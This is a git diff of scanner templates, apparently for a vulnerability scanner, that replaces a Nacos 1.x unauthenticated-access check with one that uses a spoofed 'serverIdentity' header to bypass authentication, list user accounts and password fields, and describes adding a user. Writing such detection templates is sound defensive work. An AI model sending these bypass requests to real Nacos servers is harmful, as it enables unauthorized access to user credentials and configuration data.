diff --git a/http/misconfiguration/unauthenticated-nacos-access.yaml b/http/misconfiguration/unauthenticated-nacos-access.yaml deleted file mode 100644 index 020f05e92f..0000000000 --- a/http/misconfiguration/unauthenticated-nacos-access.yaml +++ /dev/null @@ -1,40 +0,0 @@ -id: unauthenticated-nacos-access - -info: - name: Nacos 1.x - Authentication Bypass - author: taielab,pikpikcu - severity: critical - description: "Nacos 1.x was discovered. A default Nacos instance needs to modify the application.properties configuration file or add the JVM startup variable Dnacos.core.auth.enabled=true to enable the authentication function (reference: https://nacos.io/en-us/docs/auth.html). But authentication can still be bypassed under certain circumstances and any interface can be called as in the following example that can add a new user (POST https://127.0.0.1:8848/nacos/v1/auth/users?username=test&password=test). That user can then log in to the console to access, modify, and add data." - reference: - - https://github.com/alibaba/nacos/issues/4593 - - https://nacos.io/en-us/docs/auth.html - tags: nacos,unauth,misconfig - metadata: - max-request: 2 - -http: - - method: GET - path: - - "{{BaseURL}}/nacos/v1/auth/users?pageNo=1&pageSize=9" - - "{{BaseURL}}/v1/auth/users?pageNo=1&pageSize=9" - headers: - User-Agent: Nacos-Server - - matchers-condition: and - matchers: - - - type: word - words: - - "Content-Type: application/json" - part: header - - - type: regex - regex: - - '"username":' - - '"password":' - part: body - condition: and - - - type: status - status: - - 200 diff --git a/http/vulnerabilities/other/nacos-auth-bypass.yaml b/http/vulnerabilities/other/nacos-auth-bypass.yaml new file mode 100644 index 0000000000..fa572054da --- /dev/null +++ b/http/vulnerabilities/other/nacos-auth-bypass.yaml @@ -0,0 +1,46 @@ +id: nacos-auth-bypass + +info: + name: Nacos 1.x - Authentication Bypass + author: taielab,pikpikcu,SleepingBag945 + severity: critical + description: | + Nacos 1.x was discovered. A default Nacos instance needs to modify the application.properties configuration file or add the JVM startup variable Dnacos.core.auth.enabled=true to enable the authentication function (reference: https://nacos.io/en-us/docs/auth.html). But authentication can still be bypassed under certain circumstances and any interface can be called as in the following example that can add a new user (POST https://127.0.0.1:8848/nacos/v1/auth/users?username=test&password=test). That user can then log in to the console to access, modify, and add data. + reference: + - https://github.com/alibaba/nacos/issues/4593 + - https://nacos.io/en-us/docs/auth.html + - https://zhuanlan.zhihu.com/p/602021283 + metadata: + max-request: 1 + verified: true + fofa-query: app="NACOS" + tags: nacos,auth-bypass + +http: + - method: GET + path: + - "{{BaseURL}}/nacos/v1/auth/users?pageNo=1&pageSize=9" + - "{{BaseURL}}/v1/auth/users?pageNo=1&pageSize=9" + headers: + serverIdentity: security + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"totalCount":' + - '"username":' + - '"password":' + - '"pagesAvailable":' + condition: and + + - type: word + part: header + words: + - application/json + + - type: status + status: + - 200